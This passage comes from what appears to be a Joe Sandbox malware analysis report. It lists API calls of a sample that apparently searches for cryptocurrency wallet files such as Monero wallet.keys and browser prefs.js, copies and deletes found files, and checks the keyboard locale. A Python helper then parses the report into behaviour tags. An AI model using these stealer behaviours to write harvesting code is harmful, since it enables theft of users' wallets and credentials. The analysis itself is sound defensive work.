                  • StrCmpCA.SHLWAPI(?,00895304), ref: 00871989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00871D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00871DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00871E20
                  • FindClose.KERNEL32(000000FF), ref: 00871E32
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                   • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 3947ec8b4e6ddfcb04477b8b67ce728532a1fe5c0f78f037ce992392e42e8345
                  • Instruction ID: c597f54b6a623b795efe94fafac30f90a1c7abca5dff78255ffbc9a1c4c3e82c
                  • Opcode Fuzzy Hash: 3947ec8b4e6ddfcb04477b8b67ce728532a1fe5c0f78f037ce992392e42e8345
                  • Instruction Fuzzy Hash: E712C1719101189AEB1DFB64CC96AED7378FF54300F4041AAA51AE61D1EF346B89CFA3
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00890C2E), ref: 0087DE5E
                  • StrCmpCA.SHLWAPI(?,008914C8), ref: 0087DEAE
                  • StrCmpCA.SHLWAPI(?,008914CC), ref: 0087DEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0087E3E0
                  • FindClose.KERNEL32(000000FF), ref: 0087E3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                   • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: 449511048729a04b1a8bc2d775689a4220cea3e9eb69165d88256bd0b536dc55
                  • Instruction ID: dfa998e5cf47fe92ad00926f7f0cbb6542f76d75826806a1437d03dbbf184ba2
                  • Opcode Fuzzy Hash: 449511048729a04b1a8bc2d775689a4220cea3e9eb69165d88256bd0b536dc55
                  • Instruction Fuzzy Hash: 37F17F718141189AEB19FB64DD95AEE7338FF54300F5041EAA41AE20D1EF346B8ACF63
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                   • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: c)8$.}~$/XUo$W@7$X?[_$[5s$aq~/$c4Gp$wuu.$yOQS
                  • API String ID: 0-310255681
                  • Opcode ID: f23230b4c77f10f749b79180db0af7f433f86077b70f04eb75f3a21a719aca15
                  • Instruction ID: 3d7c3d9fcc5f9cbab871c010388f38e3eb4b51a678c18885e756ea91142a4eae
                  • Opcode Fuzzy Hash: f23230b4c77f10f749b79180db0af7f433f86077b70f04eb75f3a21a719aca15
                  • Instruction Fuzzy Hash: C3B208F360C2049FD304AF2DEC8567ABBE5EF94720F16853DEAC487744E63558058697
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008914B0,00890C2A), ref: 0087DAEB
                  • StrCmpCA.SHLWAPI(?,008914B4), ref: 0087DB33
                  • StrCmpCA.SHLWAPI(?,008914B8), ref: 0087DB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0087DDCC
                  • FindClose.KERNEL32(000000FF), ref: 0087DDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                   • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: fddd3aa71d67bb6d25048e994cf8d9c95e91c1e997be3234edac0afccdb05a8d
                  • Instruction ID: c79b14289ac14a5b8830d212a1ed966db3d77f7ddc68ba7de94723d9e9c1709a
                  • Opcode Fuzzy Hash: fddd3aa71d67bb6d25048e994cf8d9c95e91c1e997be3234edac0afccdb05a8d
                  • Instruction Fuzzy Hash: 7C91547290010497DB18FBB8DC969ED737DFF94300F408669A85AD6195EE38EB098B93
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,008905AF), ref: 00887BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00887BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00887C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00887C62
                  • LocalFree.KERNEL32(00000000), ref: 00887D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                   • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: f835def071628f6ff7c74e0dff456e7fa494b0c7d6ec37eee346b0c0cd68ee28
                  • Instruction ID: ebeec545bb2876868045ad3ca3ab524606d40e5ac3c778fcb54b56d15f21a1d6
                  • Opcode Fuzzy Hash: f835def071628f6ff7c74e0dff456e7fa494b0c7d6ec37eee346b0c0cd68ee28
                  • Instruction Fuzzy Hash: B4414F7194021CABDB24EB94DC99BEDB774FF54700F2041D9E409A2291DB786F86CFA2
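The function entries above all describe the same two building blocks of this sample. The first is a FindFirstFileA / FindNextFileA / FindClose walk in which every returned name is passed twice to StrCmpCA before the path is rebuilt with wsprintfA (the "%s\%s" and "%s\*.*" String IDs) and recursed; the subcalls resolve targets such as prefs.js and \Monero\wallet.keys, and one walker (ref 00871923) additionally calls CopyFileA and DeleteFileA on what it finds. The second is the GetKeyboardLayoutList / GetLocaleInfoA pair behind the "may stop execution after checking locale" signature. The Python below is an added triage helper, not part of the Joe Sandbox report: it parses the report's own "APIs" and "String ID" lines into per-function call chains and tags those two patterns. The excerpt it runs on is constructed from lines copied from the entries above. Two things in it are assumptions rather than report facts: the LCType names come from winnls.h (the report only shows the value 0x2 passed to GetLocaleInfoA), and the "dot-entry-skip?" tag infers the usual "." / ".." comparison from two StrCmpCA string pointers that sit 4 bytes apart, which the report does not resolve.

```python
import re
from collections import namedtuple

# Constructed excerpt: API and String ID lines copied from four function entries above.
REPORT_EXCERPT = """\
APIs
• wsprintfA.USER32 ref: 00883EC3
• FindFirstFileA.KERNEL32(?,?), ref: 00883EDA
• StrCmpCA.SHLWAPI(?,00890FAC), ref: 00883F08
• StrCmpCA.SHLWAPI(?,00890FB0), ref: 00883F1E
• FindNextFileA.KERNEL32(000000FF,?), ref: 0088406C
• FindClose.KERNEL32(000000FF), ref: 00884081
• String ID: %s\\%s$%s\\*
APIs
  • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\\Monero\\wallet.keys,00890E17), ref: 0088A9C5
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008915B8,00890D96), ref: 0087F71E
• StrCmpCA.SHLWAPI(?,008915BC), ref: 0087F76F
• StrCmpCA.SHLWAPI(?,008915C0), ref: 0087F785
• FindNextFileA.KERNEL32(000000FF,?), ref: 0087FAB1
• FindClose.KERNEL32(000000FF), ref: 0087FAC3
• String ID: prefs.js
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0089510C,?,?,?,008951B4,?,?,00000000,?,00000000), ref: 00871923
• StrCmpCA.SHLWAPI(?,0089525C), ref: 00871973
• StrCmpCA.SHLWAPI(?,00895304), ref: 00871989
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00871D40
• DeleteFileA.KERNEL32(00000000), ref: 00871DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00871E20
• FindClose.KERNEL32(000000FF), ref: 00871E32
• String ID: \\*.*
APIs
• GetKeyboardLayoutList.USER32(00000000,00000000,008905AF), ref: 00887BE1
• LocalAlloc.KERNEL32(00000040,?), ref: 00887BF9
• GetKeyboardLayoutList.USER32(?,00000000), ref: 00887C0D
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00887C62
• LocalFree.KERNEL32(00000000), ref: 00887D22
• String ID: /
"""

CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
STRING_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<strings>.*?)\s*$")
HEX_RE = re.compile(r"^[0-9A-F]{8}$")
# LCType values as defined in winnls.h (assumption: the report only shows the raw value 0x2).
LCTYPE_NAMES = {0x1: "LOCALE_ILANGUAGE", 0x2: "LOCALE_SLANGUAGE", 0x59: "LOCALE_SISO639LANGNAME"}
Call = namedtuple("Call", "api module args ref caller")  # caller is set for "Part of subcall" lines

def parse_entries(text):
    """Split at each 'APIs' header; collect the call lines and String IDs listed below it."""
    entries = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            entries.append({"calls": [], "strings": []})
        elif entries and (m := CALL_RE.match(line)):
            args = m["args"].split(",") if m["args"] is not None else []
            entries[-1]["calls"].append(Call(m["api"], m["module"], args, int(m["ref"], 16), m["caller"]))
        elif entries and (m := STRING_RE.match(line)) and m["strings"]:
            entries[-1]["strings"] += [s for s in m["strings"].split("$") if s]  # '$' separates String IDs
    return entries

def direct(entry):
    """Calls made by the function itself, excluding the 'Part of subcall function' lines."""
    return [c for c in entry["calls"] if c.caller is None]

def literal_args(entry):
    """Arguments the report resolved to a string literal (e.g. \\Monero\\wallet.keys), subcalls included."""
    return sorted({a for c in entry["calls"] for a in c.args if a and a != "?" and not HEX_RE.match(a)})

def classify(entry):
    apis = [c.api for c in direct(entry)]
    tags = []
    if "FindFirstFileA" in apis and "FindNextFileA" in apis:
        tags.append("directory-walk")
        if "FindClose" not in apis:
            tags.append("no-FindClose-listed")
        # Two StrCmpCA calls per found name against string pointers 4 bytes apart fit the
        # usual "." / ".." skip. The report does not resolve the pointers, so this is an
        # inference and the tag carries a question mark.
        ptrs = [int(c.args[1], 16) for c in direct(entry)
                if c.api == "StrCmpCA" and len(c.args) == 2 and HEX_RE.match(c.args[1])]
        if len(ptrs) == 2 and abs(ptrs[1] - ptrs[0]) == 4:
            tags.append("dot-entry-skip?")
        if "CopyFileA" in apis and "DeleteFileA" in apis:
            tags.append("copy-then-delete")
    for c in direct(entry):
        if c.api == "GetLocaleInfoA" and len(c.args) > 1 and HEX_RE.match(c.args[1]):
            lctype = int(c.args[1], 16)  # second argument of GetLocaleInfoA is the LCType
            tags.append("locale-check:" + LCTYPE_NAMES.get(lctype, hex(lctype)))
    return tags

def summarize(text):
    """One row per function entry: first ref, direct call chain, String IDs, literals, tags."""
    rows = []
    for e in parse_entries(text):
        d = direct(e)
        rows.append({"ref": f"{d[0].ref:08X}" if d else None, "chain": [c.api for c in d],
                     "strings": e["strings"], "literal_args": literal_args(e), "tags": classify(e)})
    return rows
```

Running summarize(REPORT_EXCERPT) yields four rows: the two walkers at 00883EC3 and 0087F71E tagged directory-walk plus dot-entry-skip?, the 00871923 walker tagged directory-walk plus copy-then-delete (its StrCmpCA pointers are not adjacent, so no dot-entry inference), and the 00887BE1 function tagged locale-check:LOCALE_SLANGUAGE. Feeding it the full report text works the same way, since it keys only on the "APIs" header and the bullet lines.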
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                   • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 6Y$Am}{$YqH_$ZhjG$ecy|$bow$pM]
                  • API String ID: 0-778756910
                  • Opcode ID: b6bcdec2871480778908ed3d76f60c0921f7e9cd93fb7c77fd6c240a90f17dd1
                  • Instruction ID: 78eaa14f0a3bfe2002aba495798f7aa30942ebe39bf3eb3b49c02f27071f6a57
                  • Opcode Fuzzy Hash: b6bcdec2871480778908ed3d76f60c0921f7e9cd93fb7c77fd6c240a90f17dd1
                  • Instruction Fuzzy Hash: FEB229F3A0C214AFE704AE2DDC8567ABBE9EFD4720F16453DEAC4C3744E93598058692
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00890D73), ref: 0087E4A2
                  • StrCmpCA.SHLWAPI(?,008914F8), ref: 0087E4F2
                  • StrCmpCA.SHLWAPI(?,008914FC), ref: 0087E508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0087EBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: 84597ed14de7c55752ad096b3aaa9fb77af365ff2f0650fb9ec4c0d2aa3aaf91
                  • Instruction ID: b3c4455f9fd989cc337c2e4fa7fdf77d8aa36c6a87931a620b9ff15fa03b293f
                  • Opcode Fuzzy Hash: 84597ed14de7c55752ad096b3aaa9fb77af365ff2f0650fb9ec4c0d2aa3aaf91
                  • Instruction Fuzzy Hash: 1C1221719101189AEB1CFB64DD96AED7338FF54300F4041AAA51AE61D1EF386F49CBA3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "h`$/M|$7]mW$r9{$~hiz$>_{
                  • API String ID: 0-2311371758
                  • Opcode ID: 68470f1fdd4159dd062a99fc2650d7e15f5a5ca0df4a2591a8aee5f0d9e01711
                  • Instruction ID: b8e06396bcf51e59e5553ca36b9a3b47a2ceff73d5dc931aeaeed5e3613a3eb7
                  • Opcode Fuzzy Hash: 68470f1fdd4159dd062a99fc2650d7e15f5a5ca0df4a2591a8aee5f0d9e01711
                  • Instruction Fuzzy Hash: 53B22AF360C2049FE3086E2DEC8567ABBE9EF94720F1A493DE6C5C3740EA7558058697
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
